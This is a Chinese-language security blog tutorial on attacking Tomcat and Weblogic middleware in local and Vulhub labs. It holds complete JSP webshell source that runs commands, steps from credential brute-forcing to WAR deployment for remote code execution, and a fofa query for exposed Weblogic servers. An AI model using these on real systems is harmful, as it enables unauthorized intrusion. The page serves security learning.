<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222" media="(prefers-color-scheme: light)">
<meta name="theme-color" content="#222" media="(prefers-color-scheme: dark)"><meta name="generator" content="Hexo 8.1.2">

  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/7.0.0/css/all.min.css" integrity="sha256-VHqXKFhhMxcpubYf9xiWdCiojEbY9NexQ4jh8AxbvcM=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"byroins.github.io","root":"/","images":"/images","scheme":"Gemini","darkmode":true,"version":"8.28.0","exturl":false,"sidebar":{"position":"left","width_expanded":320,"width_dual_column":240,"display":"post","padding":18,"offset":12},"hljswrap":true,"codeblock":{"theme":{"light":"github","dark":"atom-one-dark"},"prism":{"light":"prism","dark":"prism-dark"},"copy_button":{"enable":true,"style":"mac"},"fold":{"enable":true,"height":500},"language":true},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":true,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"duration":200,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"i18n":{"placeholder":"Searching...","empty":"We didn't find any results for the search: ${query}","hits_time":"${hits} results found in ${time} ms","hits":"${hits} results found"},"path":"/search.json","localsearch":{"enable":true,"top_n_per_article":2,"unescape":true,"preload":false}}</script><script src="/js/config.js" defer></script>

    <meta name="description" content="Environment: Tomcat-11.0.22 &amp; JDK-17.0.12 &amp; Docker &amp; Vulhub   Tools: BurpSuite WeblogicScan  1.0 中间件安全1.1 什么是中间件?中间件(Middleware) 是指一种软件组件, 作用是在不同系统, 应用程序或服务之间传递数据和消息, 通常位于应用程序和操作系统之间, 负责在">
<meta property="og:type" content="article">
<meta property="og:title" content="Middleware">
<meta property="og:url" content="https://byroins.github.io/2026/09/03/middleware/2026-09-03-middleware/index.html">
<meta property="og:site_name" content="Byron">
<meta property="og:description" content="Environment: Tomcat-11.0.22 &amp; JDK-17.0.12 &amp; Docker &amp; Vulhub   Tools: BurpSuite WeblogicScan  1.0 中间件安全1.1 什么是中间件?中间件(Middleware) 是指一种软件组件, 作用是在不同系统, 应用程序或服务之间传递数据和消息, 通常位于应用程序和操作系统之间, 负责在">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://byroins.github.io/2026/09/03/middleware/2026-09-03-middleware/1.png">
<meta property="og:image" content="https://byroins.github.io/2026/09/03/middleware/2026-09-03-middleware/2.png">
<meta property="og:image" content="https://byroins.github.io/2026/09/03/middleware/2026-09-03-middleware/3.png">
<meta property="og:image" content="https://byroins.github.io/2026/09/03/middleware/2026-09-03-middleware/4.png">
<meta property="og:image" content="https://byroins.github.io/2026/09/03/middleware/2026-09-03-middleware/5.png">
<meta property="og:image" content="https://byroins.github.io/2026/09/03/middleware/2026-09-03-middleware/6.png">
<meta property="og:image" content="https://byroins.github.io/2026/09/03/middleware/2026-09-03-middleware/7.png">
<meta property="og:image" content="https://byroins.github.io/2026/09/03/middleware/2026-09-03-middleware/8.png">
<meta property="og:image" content="https://byroins.github.io/2026/09/03/middleware/2026-09-03-middleware/9.png">
<meta property="og:image" content="https://byroins.github.io/2026/09/03/middleware/2026-09-03-middleware/10.png">
<meta property="og:image" content="https://byroins.github.io/2026/09/03/middleware/2026-09-03-middleware/11.png">
<meta property="og:image" content="https://byroins.github.io/2026/09/03/middleware/2026-09-03-middleware/12.png">
<meta property="og:image" content="https://byroins.github.io/2026/09/03/middleware/2026-09-03-middleware/13.png">
<meta property="og:image" content="https://byroins.github.io/2026/09/03/middleware/2026-09-03-middleware/14.png">
<meta property="og:image" content="https://byroins.github.io/2026/09/03/middleware/2026-09-03-middleware/15.png">
<meta property="og:image" content="https://byroins.github.io/2026/09/03/middleware/2026-09-03-middleware/16.png">
<meta property="og:image" content="https://byroins.github.io/2026/09/03/middleware/2026-09-03-middleware/17.png">
<meta property="og:image" content="https://byroins.github.io/2026/09/03/middleware/2026-09-03-middleware/18.png">
<meta property="og:image" content="https://byroins.github.io/2026/09/03/middleware/2026-09-03-middleware/19.png">
<meta property="og:image" content="https://byroins.github.io/2026/09/03/middleware/2026-09-03-middleware/20.png">
<meta property="og:image" content="https://byroins.github.io/2026/09/03/middleware/2026-09-03-middleware/21.png">
<meta property="og:image" content="https://byroins.github.io/2026/09/03/middleware/2026-09-03-middleware/22.png">
<meta property="og:image" content="https://byroins.github.io/2026/09/03/middleware/2026-09-03-middleware/23.png">
<meta property="og:image" content="https://byroins.github.io/2026/09/03/middleware/2026-09-03-middleware/24.png">
<meta property="og:image" content="https://byroins.github.io/2026/09/03/middleware/2026-09-03-middleware/25.png">
<meta property="og:image" content="https://byroins.github.io/2026/09/03/middleware/2026-09-03-middleware/26.png">
<meta property="og:image" content="https://byroins.github.io/2026/09/03/middleware/2026-09-03-middleware/27.png">
<meta property="og:image" content="https://byroins.github.io/2026/09/03/middleware/2026-09-03-middleware/28.png">
<meta property="og:image" content="https://byroins.github.io/2026/09/03/middleware/2026-09-03-middleware/29.png">
<meta property="og:image" content="https://byroins.github.io/2026/09/03/middleware/2026-09-03-middleware/30.png">
<meta property="article:published_time" content="2026-09-03T14:00:00.000Z">
<meta property="article:modified_time" content="2026-09-04T13:02:58.398Z">
<meta property="article:author" content="Byron">
<meta property="article:tag" content="WeblogicScan">
<meta property="article:tag" content="jar">
<meta property="article:tag" content="middleware">
<meta property="article:tag" content="tomcat">
<meta property="article:tag" content="war">
<meta property="article:tag" content="weblogic">
<meta property="article:tag" content="中间件">
<meta property="article:tag" content="暴力破解">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://byroins.github.io/2026/09/03/middleware/2026-09-03-middleware/1.png">


<link rel="canonical" href="https://byroins.github.io/2026/09/03/middleware/2026-09-03-middleware/">


<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"en","comments":true,"permalink":"https://byroins.github.io/2026/09/03/middleware/2026-09-03-middleware/","path":"2026/09/03/middleware/2026-09-03-middleware/","title":"Middleware"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>Middleware | Byron</title>
  








  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous" defer></script>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/lozad.js/1.16.0/lozad.min.js" integrity="sha256-mOFREFhqmHeQbXpK2lp4nA3qooVgACfh88fpJftLBbc=" crossorigin="anonymous" defer></script>
<script src="/js/utils.js" defer></script><script src="/js/motion.js" defer></script><script src="/js/sidebar.js" defer></script><script src="/js/next-boot.js" defer></script>

  <script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-generator-searchdb/1.5.0/search.js" integrity="sha256-xFC6PJ82SL9b3WkGjFavNiA9gm5z6UBxWPiu4CYjptg=" crossorigin="anonymous" defer></script>
<script src="/js/third-party/search/local-search.js" defer></script>


  <script class="next-config" data-name="mermaid" type="application/json">{"enable":true,"theme":{"light":"default","dark":"dark"},"js":{"url":"https://cdnjs.cloudflare.com/ajax/libs/mermaid/11.10.1/mermaid.min.js","integrity":"sha256-BmQmdWDS8X2OTbrwELWK366LV6escyWhHHe0XCTU/Hk="}}</script>
  <script src="/js/third-party/tags/mermaid.js" defer></script>





  
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>





  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
<link rel="alternate" href="/atom.xml" title="Byron" type="application/atom+xml">
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">Byron</p>
      <i class="logo-line"></i>
    </a>
      <p class="site-subtitle" itemprop="description">Web Application Security Research & Exploit Development</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="Search" role="button">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a></li><li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives</a></li><li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>Categories</a></li><li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>Tags</a></li><li class="menu-item menu-item-about"><a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>About</a></li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>Search
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
      <div class="search-header">
        <span class="search-icon">
          <i class="fa fa-search"></i>
        </span>
        <div class="search-input-container">
          <input autocomplete="off" autocapitalize="off" maxlength="80"
                placeholder="Searching..." spellcheck="false"
                type="search" class="search-input">
        </div>
        <span class="popup-btn-close" role="button">
          <i class="fa fa-times-circle"></i>
        </span>
      </div>
      <div class="search-result-container">
        <div class="search-result-icon">
          <i class="fa fa-spinner fa-pulse fa-5x"></i>
        </div>
      </div>
    </div>
  </div>

</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#1-0-%E4%B8%AD%E9%97%B4%E4%BB%B6%E5%AE%89%E5%85%A8"><span class="nav-number">1.</span> <span class="nav-text">1.0 中间件安全</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1-1-%E4%BB%80%E4%B9%88%E6%98%AF%E4%B8%AD%E9%97%B4%E4%BB%B6"><span class="nav-number">1.1.</span> <span class="nav-text">1.1 什么是中间件?</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#1-2-%E4%B8%AD%E9%97%B4%E4%BB%B6%E6%BC%8F%E6%B4%9E"><span class="nav-number">1.2.</span> <span class="nav-text">1.2 中间件漏洞</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#2-0-Tomcat"><span class="nav-number">2.</span> <span class="nav-text">2.0  Tomcat</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#2-1-Tomcat%E5%AF%86%E7%A0%81%E7%88%86%E7%A0%B4%E5%88%B0WAR%E5%8C%85%E9%83%A8%E7%BD%B2"><span class="nav-number">2.1.</span> <span class="nav-text">2.1 Tomcat密码爆破到WAR包部署</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#01-%E7%8E%AF%E5%A2%83%E5%87%86%E5%A4%87"><span class="nav-number">2.1.1.</span> <span class="nav-text">01 环境准备</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#02-Tomcat%E8%B4%A6%E5%8F%B7%E7%88%86%E7%A0%B4"><span class="nav-number">2.1.2.</span> <span class="nav-text">02 Tomcat账号爆破</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#03-WAR%E5%8C%85%E9%83%A8%E7%BD%B2"><span class="nav-number">2.1.3.</span> <span class="nav-text">03 WAR包部署</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#3-0-Weblogic"><span class="nav-number">3.</span> <span class="nav-text">3.0  Weblogic</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#3-1-Weblogic-%E5%8E%86%E5%8F%B2%E6%BC%8F%E6%B4%9E%E5%8F%91%E7%8E%B0%E5%8F%8A%E5%88%A9%E7%94%A8"><span class="nav-number">3.1.</span> <span class="nav-text">3.1 Weblogic 历史漏洞发现及利用</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#01-%E8%B5%84%E4%BA%A7%E8%8E%B7%E5%8F%96"><span class="nav-number">3.1.1.</span> <span class="nav-text">01 资产获取</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#02-%E7%8E%AF%E5%A2%83%E5%87%86%E5%A4%87"><span class="nav-number">3.1.2.</span> <span class="nav-text">02 环境准备</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#03-%E8%B4%A6%E6%88%B7%E7%88%86%E7%A0%B4"><span class="nav-number">3.1.3.</span> <span class="nav-text">03 账户爆破</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#04-Webshell%E5%86%99%E5%85%A5"><span class="nav-number">3.1.4.</span> <span class="nav-text">04 Webshell写入</span></a></li></ol></li></ol></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="Byron"
      src="/images/private/icon1.png">
  <p class="site-author-name" itemprop="name">Byron</p>
  <div class="site-description" itemprop="description">Documenting vulnerability reproduction, SRC bug bounty write-ups, and custom penetration testing tools.</div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">17</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
          <a href="/categories/">
        <span class="site-state-item-count">14</span>
        <span class="site-state-item-name">categories</span></a>
      </div>
      <div class="site-state-item site-state-tags">
          <a href="/tags/">
        <span class="site-state-item-count">82</span>
        <span class="site-state-item-name">tags</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author animated">
      <span class="links-of-author-item">
        <a href="https://github.com/byroins/penetration-testing" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;byroins&#x2F;penetration-testing" rel="noopener me" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="/atom.xml" title="RSS → &#x2F;atom.xml" rel="noopener me"><i class="fa fa-rss fa-fw"></i>RSS</a>
      </span>
  </div>

        </div>
      </div>
    </div>

    
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="en">
    <link itemprop="mainEntityOfPage" href="https://byroins.github.io/2026/09/03/middleware/2026-09-03-middleware/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/private/icon1.png">
      <meta itemprop="name" content="Byron">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Byron">
      <meta itemprop="description" content="Documenting vulnerability reproduction, SRC bug bounty write-ups, and custom penetration testing tools.">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="Middleware | Byron">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          Middleware
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">Posted on</span>

      <time title="Created: 2026-09-03 22:00:00" itemprop="dateCreated datePublished" datetime="2026-09-03T22:00:00+08:00">2026-09-03</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar-check"></i>
      </span>
      <span class="post-meta-item-text">Edited on</span>
      <time title="Modified: 2026-09-04 21:02:58" itemprop="dateModified" datetime="2026-09-04T21:02:58+08:00">2026-09-04</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">In</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/middleware/" itemprop="url" rel="index"><span itemprop="name">middleware</span></a>
        </span>
    </span>

  
    <span class="post-meta-item" title="Views" id="busuanzi_container_page_pv">
      <span class="post-meta-item-icon">
        <i class="far fa-eye"></i>
      </span>
      <span class="post-meta-item-text">Views: </span>
      <span id="busuanzi_value_page_pv"></span>
    </span>
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody"><blockquote>
<p>Environment: Tomcat-11.0.22 &amp; JDK-17.0.12 &amp; Docker &amp; Vulhub</p>
</blockquote>
<blockquote>
<p>Tools: BurpSuite WeblogicScan</p>
</blockquote>
<h2 id="1-0-中间件安全"><a href="#1-0-中间件安全" class="headerlink" title="1.0 中间件安全"></a>1.0 中间件安全</h2><h3 id="1-1-什么是中间件"><a href="#1-1-什么是中间件" class="headerlink" title="1.1 什么是中间件?"></a>1.1 什么是中间件?</h3><p>中间件(Middleware) 是指一种软件组件, 作用是在不同系统, 应用程序或服务之间传递数据和消息, 通常位于应用程序和操作系统之间, 负责在不同的应用程序之间传递数据, 协调不同应用程序之间的通信, 以及处理网络请求等.</p>
<p>中间件通常是插件式架构, 允许被集成到现有应用程序中, 可提供如: 身份验证, 授权, 缓存, 负载均衡, 日志记录, 安全性等功能, 以求简化应用程序的开发和部署过程.</p>
<ul>
<li>广义: 涵盖了从web服务器到身份验证系统, 再到消息传递等一切内容</li>
<li>具体: <code>Jboss</code> <code>Weblogic</code> <code>Tomcat</code> <code>Apache</code>等</li>
</ul>
<p><img data-src="/2026/09/03/middleware/2026-09-03-middleware/1.png"></p>
<h3 id="1-2-中间件漏洞"><a href="#1-2-中间件漏洞" class="headerlink" title="1.2 中间件漏洞"></a>1.2 中间件漏洞</h3><p>中间件漏洞是指在中间件软件中存在的安全漏洞, 通常包含以下几种:</p>
<ol>
<li>代码注入漏洞: 向中间件发送恶意代码, 执行任意代码或获取敏感数据;</li>
<li>跨站脚本漏洞: 在中间件输出的网页中插入恶意脚本, 来窃取用户信息或进行其他恶意行为;</li>
<li>SQL注入漏洞: 对中间件输入的SQL查询中插入恶意代码, 执行任意SQL查询或获取敏感数据;</li>
<li>认证和授权漏洞: 攻击者可以利用中间件的认证和授权机制的漏洞, 来绕过访问控制, 获取系统权限;</li>
<li>文件包含漏洞: 攻击者可以利用中间件的文件包含功能, 来包含恶意文件并执行任意代码.</li>
</ol>
<hr>
<h2 id="2-0-Tomcat"><a href="#2-0-Tomcat" class="headerlink" title="2.0  Tomcat"></a>2.0  Tomcat</h2><p><code>Tomcat</code>是一个开源的<code>Java Servlet</code>容器, 由<code>Apache</code>软件基金会开发, 它可以作为独立的<code>Web服务器</code>或<code>应用服务器</code>, 也可以作为其他Web服务器的插件来使用, 如<code>Apache HTTP Server</code>.</p>
<p><code>Tomcat</code>支持<code>Java Servlet</code>, <code>JavaServer Pages(JSP)</code>, <code>Java Expression Language(EL)</code>和<code>WebSocket</code>等<code>Java</code>技术, 并提供了许多企业级特性, 如集群, 安全性和可扩展性.</p>
<hr>
<h3 id="2-1-Tomcat密码爆破到WAR包部署"><a href="#2-1-Tomcat密码爆破到WAR包部署" class="headerlink" title="2.1 Tomcat密码爆破到WAR包部署"></a>2.1 Tomcat密码爆破到WAR包部署</h3><h4 id="01-环境准备"><a href="#01-环境准备" class="headerlink" title="01 环境准备"></a>01 环境准备</h4><ul>
<li><p>环境需要有本地<code>JDK</code>≥ 17</p>
</li>
<li><p>Tomcat 11</p>
<blockquote>
<p>以上环境仅本案例配置组合, <code>JDK</code>≥ 17只针对Tomcat 11版本</p>
</blockquote>
<ul>
<li><p>conf&#x2F;tomcat-users.xml 文件添加用户</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">role</span> <span class="attr">rolename</span>=<span class="string">&quot;manager-gui&quot;</span>/&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">role</span> <span class="attr">rolename</span>=<span class="string">&quot;manager-script&quot;</span>/&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">user</span> <span class="attr">username</span>=<span class="string">&quot;admin&quot;</span> <span class="attr">password</span>=<span class="string">&quot;123456&quot;</span> <span class="attr">roles</span>=<span class="string">&quot;manager-gui,manager-script&quot;</span>/&gt;</span></span><br></pre></td></tr></table></figure></li>
</ul>
</li>
<li><p>启动服务并访问本地8080端口</p>
<p><img data-src="/2026/09/03/middleware/2026-09-03-middleware/2.png"></p>
</li>
<li><p>管理后台访问</p>
<blockquote>
<p>访问&#x2F;manager&#x2F;html 或点击 Manager APP</p>
</blockquote>
<p><img data-src="/2026/09/03/middleware/2026-09-03-middleware/3.png"></p>
</li>
</ul>
<hr>
<h4 id="02-Tomcat账号爆破"><a href="#02-Tomcat账号爆破" class="headerlink" title="02 Tomcat账号爆破"></a>02 Tomcat账号爆破</h4><ul>
<li><p>访问Tomcat登录页面, 抓取登录包</p>
<p><img data-src="/2026/09/03/middleware/2026-09-03-middleware/4.png"></p>
<blockquote>
<p>Authorization字段包含一串字符串</p>
<p>字符串: <code>username:password</code>→Base64</p>
</blockquote>
</li>
<li><p>数据包发送到Intruder进行账户爆破</p>
<p><img data-src="/2026/09/03/middleware/2026-09-03-middleware/5.png"></p>
</li>
<li><p>成功爆破数据</p>
<p><img data-src="/2026/09/03/middleware/2026-09-03-middleware/6.png"></p>
</li>
</ul>
<hr>
<h4 id="03-WAR包部署"><a href="#03-WAR包部署" class="headerlink" title="03 WAR包部署"></a>03 WAR包部署</h4><p><code>WAR(Web Application Archive)</code> 是一种Web应用程序的打包格式, 用于将Web应用程序打包成一个单独的文件, 便于部署和分发. WAR文件实际上是一种JAR(Java Archive)文件, 其中包含了Web应用程序的全部内容, 包括Java类, HTML, JSP, Servlet, XML配置文件, 静态资源 (如图片, CSS, JavaScript文件等). WAR文件还可以包含一些特定Web应用程序的配置文件, 例如web.xml, context.xml等. </p>
<p>WAR文件通常是通过Web服务器部署的, 例如Tomcat, Jetty等. 在部署Web应用程序时, Web服务器会将WAR文件解压缩并将其部署到指定的目录中, 然后启动Web应用程序. 通过将Web应用程序打包成WAR文件, 可以方便地将应用程序部署到不同的Web服务器中, 也可以方便地将应用程序分发给其他人使用.</p>
<hr>
<ul>
<li><p>制作war包</p>
<blockquote>
<p>将以下JSP马保存为<code>.jsp</code>文件</p>
</blockquote>
<figure class="highlight jsp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">&lt;%@ page <span class="keyword">import</span>=<span class="string">&quot;java.io.*&quot;</span> %&gt;</span><br><span class="line">&lt;%</span><br><span class="line"><span class="type">String</span> <span class="variable">cmd</span> <span class="operator">=</span> request.getParameter(<span class="string">&quot;cmd&quot;</span>);</span><br><span class="line"><span class="type">String</span> <span class="variable">output</span> <span class="operator">=</span> <span class="string">&quot;&quot;</span>;</span><br><span class="line"><span class="keyword">if</span>(cmd != <span class="literal">null</span>)&#123;</span><br><span class="line">    <span class="type">String</span> <span class="variable">s</span> <span class="operator">=</span> <span class="literal">null</span>;</span><br><span class="line">    <span class="keyword">try</span>&#123;</span><br><span class="line">        <span class="type">Process</span> <span class="variable">p</span> <span class="operator">=</span> Runtime.getRuntime().exec(cmd);</span><br><span class="line">        <span class="type">BufferedReader</span> <span class="variable">sI</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">BufferedReader</span>(<span class="keyword">new</span> <span class="title class_">InputStreamReader</span>(p.getInputStream()));</span><br><span class="line">        <span class="keyword">while</span>((s = sI.readLine()) != <span class="literal">null</span>)&#123;</span><br><span class="line">            output += s +<span class="string">&quot;\r\n&quot;</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;<span class="keyword">catch</span>(IOException e)&#123;</span><br><span class="line">        e.printStackTrace();</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">out.println(output);</span><br><span class="line">%&gt;</span><br></pre></td></tr></table></figure>
</li>
<li><p>将<code>.jsp</code>文件压缩为<code>zip</code>, 修改后缀为<code>war</code></p>
<p><img data-src="/2026/09/03/middleware/2026-09-03-middleware/7.png"></p>
</li>
<li><p>登录Tomcat管理后台, 上传war包</p>
<p><img data-src="/2026/09/03/middleware/2026-09-03-middleware/8.png"></p>
<blockquote>
<p>上传成功后应用程序会识别到项目</p>
</blockquote>
</li>
<li><p>访问页面不会有报错, 且网络能加载识别到对应文件</p>
<p><img data-src="/2026/09/03/middleware/2026-09-03-middleware/9.png"></p>
</li>
<li><p>webshell</p>
<p>路径: <code>http(s)://网站域名/war包名/jsp文件</code></p>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1:8080/test/test.jsp?cmd=ipconfig</span><br></pre></td></tr></table></figure>

<p><img data-src="/2026/09/03/middleware/2026-09-03-middleware/10.png"></p>
<blockquote>
<p>成功写入webshell实现RCE</p>
</blockquote>
</li>
</ul>
<hr>
<h2 id="3-0-Weblogic"><a href="#3-0-Weblogic" class="headerlink" title="3.0  Weblogic"></a>3.0  Weblogic</h2><p><code>Weblogic Server</code>是<code>Oracle</code>开发的一款适用于云环境和传统环境应用服务中间件, 是基于<code>JavaEE</code>架构的中间件, 它提供了一个现代轻型开发平台, 用于开发, 集成, 部署和管理大型分布式web应用, 网络应用和数据库应用的<code>Java</code>应用服务器, 将java的动态功能和<code>Java Enterprise</code>标准的安全性引入大型网络应用的开发, 集成, 部署和管理中.</p>
<p>weblogic特征:</p>
<ul>
<li>默认端口: 7001</li>
<li>Web界面: Error 404–Not Found</li>
<li>控制后台: <a target="_blank" rel="noopener" href="http://ip:7001/console">http://ip:7001/console</a></li>
</ul>
<hr>
<h3 id="3-1-Weblogic-历史漏洞发现及利用"><a href="#3-1-Weblogic-历史漏洞发现及利用" class="headerlink" title="3.1 Weblogic 历史漏洞发现及利用"></a>3.1 Weblogic 历史漏洞发现及利用</h3><h4 id="01-资产获取"><a href="#01-资产获取" class="headerlink" title="01 资产获取"></a>01 资产获取</h4><ul>
<li><p>shodan, fofa, zoomeye…</p>
</li>
<li><p>默认端口: 7001</p>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="attribute">fofa</span><span class="punctuation">: </span>app=&quot;BEA-WebLogic-Server&quot; &amp;&amp; country!=&quot;CN&quot;</span><br></pre></td></tr></table></figure></li>
</ul>
<h4 id="02-环境准备"><a href="#02-环境准备" class="headerlink" title="02 环境准备"></a>02 环境准备</h4><table>
<thead>
<tr>
<th>系统</th>
<th>角色</th>
<th>环境</th>
</tr>
</thead>
<tbody><tr>
<td>Ubuntu</td>
<td>靶机</td>
<td>基于<code>Docker</code>的<code>Vulhub</code>靶场<code>/vulhub/weblogic/weak_password</code>(弱口令)</td>
</tr>
<tr>
<td>Kali</td>
<td>攻击机</td>
<td><code>WeblogicScan</code>扫描器</td>
</tr>
</tbody></table>
<blockquote>
<p><code>WeblogicScan</code>项目地址: <a target="_blank" rel="noopener" href="https://github.com/rabbitmask/WeblogicScan">https://github.com/rabbitmask/WeblogicScan</a></p>
<p><code>Vulhub</code>项目地址: <a target="_blank" rel="noopener" href="https://github.com/vulhub/vulhub">https://github.com/vulhub/vulhub</a></p>
</blockquote>
<ul>
<li><p>使用Docker一键启动靶场</p>
<p><code>docker compose up -d</code></p>
<blockquote>
<p><code>docker compose up -d</code>命令会读取当前目录下<code>docker-compose.yml</code> 拉取镜像→创建容器并在后台运行</p>
</blockquote>
<p><img data-src="/2026/09/03/middleware/2026-09-03-middleware/11.png"></p>
<p><img data-src="/2026/09/03/middleware/2026-09-03-middleware/12.png"></p>
</li>
<li><p>访问 Weblogic 服务</p>
<p><img data-src="/2026/09/03/middleware/2026-09-03-middleware/13.png"></p>
<blockquote>
<p>此页面为<code>weblogic</code>默认访问页</p>
</blockquote>
</li>
<li><p>进入控制后台</p>
